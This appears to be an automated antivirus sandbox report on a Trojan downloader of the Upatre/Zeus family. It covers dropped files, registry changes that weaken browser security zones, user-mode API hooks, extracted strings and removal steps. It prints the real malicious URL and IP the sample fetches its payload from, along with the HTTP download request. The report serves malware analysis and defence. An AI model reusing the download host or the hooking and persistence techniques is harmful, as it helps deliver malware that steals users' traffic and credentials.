MD5: cf4a38fd8f57e5ba1e9ce16d4c35d6df
SHA1: 6539aeeb0850569248e441ef73500cf9c3b936fe
SHA256: 922915bd187adb013b53cc24cad85a5b7ba5a0f62a6d2b9c159eca05db2de0a1
SSDeep: 384:KP be5GzzM5jHXRrs905INeZCFtejlIko5dN127BFVn2p4lAnZ8OxsBCtFWg:E 60zsjHXRrs9sINeZEtejlIkoLN127w
Size: 18544 bytes
File type: EXE
Platform: WIN32
Entropy: Not Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2013-04-08 06:45:01
Analyzed on: WindowsXP SP3 32-bit

Summary:

Trojan-Downloader. Trojan program, which downloads files from the Internet without user's notice and executes them.

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

lipoty.exe:1200
update_pdf.exe:1848
%original file name%.exe:608
acwuq.exe:448

The Trojan injects its code into the following process(es):

Explorer.EXE:1604

File activity

The process lipoty.exe:1200 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Application Data\Umveqe\acwuq.exe (2447 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\KUI106D.bat (175 bytes)

The process update_pdf.exe:1848 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\lipoty.exe (1623 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O1Q3GHUJ\14USp[1].pdd (295 bytes)

The process %original file name%.exe:608 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\update_pdf.exe (18 bytes)

The process acwuq.exe:448 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\NTUSER.DAT.LOG (7720 bytes)
%Documents and Settings%\%current user%\NTUSER.DAT (7172 bytes)

Registry activity

The process lipoty.exe:1200 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D2 92 01 8E AC 2B 56 D3 27 D0 9B 92 3A 48 AF FA"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

The process update_pdf.exe:1848 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp]
"lipoty.exe" = "lipoty"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1C 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "0D F4 44 91 B9 C9 62 0A 7C 2B F5 A4 1F 03 AA 94"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process %original file name%.exe:608 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A1 85 96 56 F6 B2 C8 A0 BF 00 C0 8E FA 72 EC 56"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp]
"update_pdf.exe" = "update_pdf"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The process acwuq.exe:448 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "2D E6 87 EE F8 29 38 66 3A 2E A1 9F F6 28 90 44"

[HKCU\Software\Microsoft\Yhyxovf]
"14621f9b" = "8A 0D B8 20 71 85 78 48 8F F2"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

Dropped PE files

HOSTS file anomalies

No changes have been detected.

Rootkit activity

The Trojan installs the following user-mode hooks in WININET.dll:

HttpSendRequestExA
HttpSendRequestW
InternetReadFileExA
InternetWriteFile
InternetWriteFileExA
InternetQueryDataAvailable
HttpQueryInfoW
HttpSendRequestExW
InternetReadFile
HttpQueryInfoA
HttpSendRequestA
InternetCloseHandle

The Trojan installs the following user-mode hooks in CRYPT32.dll:

PFXImportCertStore

The Trojan installs the following user-mode hooks in USER32.dll:

GetClipboardData
TranslateMessage

The Trojan installs the following user-mode hooks in Secur32.dll:

DecryptMessage
SealMessage
DeleteSecurityContext

The Trojan installs the following user-mode hooks in WS2_32.dll:

WSAGetOverlappedResult
WSASend
recv
gethostbyname
WSARecv
send
closesocket
freeaddrinfo
getaddrinfo
GetAddrInfoW

The Trojan installs the following user-mode hooks in ntdll.dll:

LdrLoadDll
NtCreateThread

Propagation

VersionInfo

No information is available.

PE Sections

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL	IP
hxxp://nevcoengineers.com/img/scenes/14USp.pdd
www.nevcoengineers.com	204.11.59.239

IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET TROJAN Downloader (P2P Zeus dropper UA)
ET TROJAN Upatre Binary Download Jan 02 2014

Traffic

GET /img/scenes/14USp.pdd HTTP/1.1

Accept: text/*, application/*

User-Agent: Updates downloader

Host: VVV.nevcoengineers.com

Cache-Control: no-cache

Connection: Keep-Alive

HTTP/1.1 200 OK

Date: Tue, 18 Mar 2014 16:56:25 GMT

Server: Apache/2.2.26 (Unix) mod_ssl/2.2.26 OpenSSL/1.0.1e-fips mod_bwlimited/1.4 PHP/5.4.26

Last-Modified: Fri, 14 Feb 2014 15:23:31 GMT

ETag: "4f68-4806f-4f25f637d7d6f"

Accept-Ranges: bytes

Content-Length: 295023

Keep-Alive: timeout=5, max=100

Connection: Keep-Alive

Content-Type: text/plain
ZZP....p.%.>...............<.......=..."Z....x.=X......T...M...O
.......S.......O...=...y...P...X...7....7l8.s.V.D...DM......GJ......hO
....\.x...... P.......D...P.......~J....\yD".:zu.?..&....o...<.....
..=.....^...0.....<...=..w.j1.7.1..a!".%4.?.4.=.7.=f<.=.......&l
t;...'a.$>...=.......9.........5.....I..PI`.......!.#........O.....
....q.. ......~..!4.5.z..b}.u....b....O.u...u.......y.........>...=
.>N....k......)=.?......`..{du.9....`..H..I=...C..".....j..>....
[email protected]..=...x...=`.Jk .Tx...d...2W......7.......=...=......
...].6...-...c)vn,...b...^K..=#>.....}^B.}...?X<.{....a.?...2..&
gt;.<.>U......."?.......qY......y......]2...om.A..J..Y..>_..|
A..<...7#>...<..aTC..t.....>!.#..E.<K.n...)x`.!...&.!..
I....1..`.J.Y....@.)-.......k...?..2...`<`..8...k.......EA.^..../..
....Rk..".pU..A..u...zk......U`U.....9...m./.?...r..lj......cm...]@.).
.....^....).............k.)O...k.E..D.....B;.u...V...>.5....^....&l
t;..A..k.. @.<..i...i.J....\....i.N......<..k....<......m....
.....b}...\...<...U.......U!........g.u.....u..kd)`.....>.}.t\=)
.Tu#}........Oo......;..h.6.....>ju.].....dkv....`..g.=.wa...)x.I!.
..R...!..>.>.I.=.6L).g)`d.a...)(u..=..J..J]..w)5.x.....g.F..]H..
...j...]....J....>...]'].. p.....M)2...p.].=..aH..Jj`.'....z.J....)
......t.....N.]._.^...u.c.|`5..!..>.>(... ........[..../9a.)p.&g
t;.<#?.:j.a=..b>...1.].....}k....MS1.....>.1k..5k}J.1.cH.....
..z..M. ..ckP.`@.*:.v.j..)...\...27..!....=.Z.b.v...F...v.......$'
<<< skipped >>>

.text

`.data

.idata

@.reloc

Invalid parameter passed to C runtime function.

>$>,>4><>

0123456789

http://www.google.com/

http://www.bing.com/

REPORT

HTTP/1.1

RegDeleteKeyExW

gdiplus.dll

GdiplusShutdown

.TJFZAIY]JD^"

?:527|:!;8

!1 (##!(

Kmv`jn`%fnfnzg,bt3crd~da4

1&,$=OJ-:&#O-

-.ynp<

'2$4>%|903

: 8? 1 !

userenv.dll

del "%s"

if exist "%s" goto d

del /F "%s"

w%fkN

t.Ht$HHt

L$$

m9.td

zcÁ

.zN6KFL

fd%C?

ntdll.dll

KERNEL32.dll

ExitWindowsEx

GetKeyboardState

MsgWaitForMultipleObjects

USER32.dll

CryptGetKeyParam

CryptImportKey

CryptDestroyKey

RegCreateKeyExW

RegCloseKey

RegQueryInfoKeyW

RegDeleteKeyW

RegOpenKeyExW

RegFlushKey

RegEnumKeyExW

ADVAPI32.dll

UrlUnescapeA

PathIsURLW

SHLWAPI.dll

ShellExecuteW

SHELL32.dll

Secur32.dll

ole32.dll

GDI32.dll

WS2_32.dll

CertDeleteCertificateFromStore

CertOpenSystemStoreW

CertCloseStore

CertEnumCertificatesInStore

CertDuplicateCertificateContext

PFXExportCertStoreEx

PFXImportCertStore

CRYPT32.dll

HttpSendRequestExA

HttpQueryInfoA

InternetCrackUrlA

HttpOpenRequestA

HttpEndRequestA

HttpAddRequestHeadersA

WININET.dll

OLEAUT32.dll

NETAPI32.dll

IPHLPAPI.DLL

VERSION.dll

msvcrt.dll

9 9$9(9,9094989

> >$>(>,>0>4>|>

00D0K0_0q0z0

:!:(:,:1:8:^:

\StringFileInfo\xx\%s

urlmon.dll

SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\%s

kernel32.dll

launchpadshell.exe

dirclt32.exe

wtng.exe

prologue.exe

pcsws.exe

fdmaster.exe

shell32.dll

cabinet.dll

Wadvapi32.dll

"%s" %s

/c "%s"

%Documents and Settings%\%current user%\Application Data

%Documents and Settings%\%current user%\Local Settings\Application Data

Global\{3D6E1BE3-083C-4088-F013-F140DE00D252}

Remove it with Ad-Aware

1. Click (here) to download and install Ad-Aware Free Antivirus.
2. Update the definition files.
3. Run a full scan of your computer.

Manual removal*

1. Scan a system with an anti-rootkit tool.
   
2. Terminate malicious process(es) (How to End a Process With the Task Manager):
   

   lipoty.exe:1200
   update_pdf.exe:1848
   %original file name%.exe:608
   acwuq.exe:448
   

3. Delete the original Trojan file.
   
4. Delete or disinfect the following files created/modified by the Trojan:
   

   %Documents and Settings%\%current user%\Application Data\Umveqe\acwuq.exe (2447 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\KUI106D.bat (175 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\lipoty.exe (1623 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O1Q3GHUJ\14USp[1].pdd (295 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\update_pdf.exe (18 bytes)
   %Documents and Settings%\%current user%\NTUSER.DAT.LOG (7720 bytes)
   

5. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
   
6. Reboot the computer.
   

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.